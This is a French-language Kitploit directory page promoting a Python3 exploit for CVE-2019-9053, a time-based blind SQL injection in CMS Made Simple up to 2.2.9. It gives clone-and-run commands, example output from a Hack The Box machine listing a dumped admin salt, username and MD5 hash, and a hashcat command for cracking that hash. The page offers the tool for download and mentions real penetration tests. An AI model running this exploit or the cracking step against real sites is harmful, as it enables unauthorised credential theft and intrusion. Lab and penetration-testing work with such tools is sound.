Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cmsms-sqli — Exploit Python3 pour CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi). Aucune dépendance, SQLi aveugle temporelle → extraction des identifiants admin. Writeup HTB possédé. | Kitploit
Outils/GitHubGitHub/tim-karov/cmsms-sqli
Cassage de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'Intrusion
GitHubtim-karov/cmsms-sqli

cmsms-sqli

Exploit Python3 pour CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi). Aucune dépendance, SQLi aveugle temporelle → extraction des identifiants admin. Writeup HTB possédé.

Voir le dépôt
il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CMS Made Simple <= 2.2.9 Injection SQL (CVE-2019-9053) - Exploit Python3

Port Python3 pur de l'original Exploit-DB #46635 par Daniele Scanu. SQLi aveugle basé sur le temps pour extraire les identifiants administrateur des installations vulnérables de CMS Made Simple.

🎯 Fonctionnalités :

✅ Aucune dépendance externe (uniquement requests)

✅ Natif Python 3.6+ (f-strings, opérateur morse)

✅ Sortie colorée élégante (ANSI)

✅ Stable et rapide (~3-5 min d'extraction sur connexions moyennes)

✅ Gestion des timeouts/erreurs pour cibles en production

✅ Sortie prête pour Hashcat (format salt + MD5)

🚀 Utilisation :

root@kitploit:~
# Clone & run
git clone https://github.com/tim-karov/cmsms-sqli
cd cmsms-sqli
python3 cmsms-sqli.py url
root@kitploit:~
# Example output (HTB Writeup):
[+] CVE-2019-9053 CMS Made Simple SQLi (Python3)
[+] Target: http://machine_ip/writeup/moduleinterface.php?mact=News,m1_,default,0
[+] Dumping SALT...
5a599ef579066807
[+] Salt: L7b8v5p3
[+] Dumping USERNAME...
jkr
[+] Username: jkr
[+] Dumping PASSWORD MD5...
62def4866937f08cc13bab43bb14e6f7
[+] MD5 Hash: 62def4866937f08cc13bab43bb14e6f7
[+] Crack: hashcat -a 0 -m 20 '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' /usr/share/wordlists/rockyou.txt

🔧 Personnalisation :

root@kitploit:~
TIME = 3      # Sleep time (slower = more stable)
timeout = 20  # Request timeout
chars = '...' # Custom charset

📝 Crédits :

Auteur original : Daniele Scanu

Exploit-DB : #46635

Port Python3 et améliorations : Tim Karov

📄 Licence :

Licence MIT - Voir LICENSE


⭐ Mettez une étoile si utile ! Utilisé dans les laboratoires HTB/TryHackMe et les tests d'intrusion réels.

Télécharger l’outil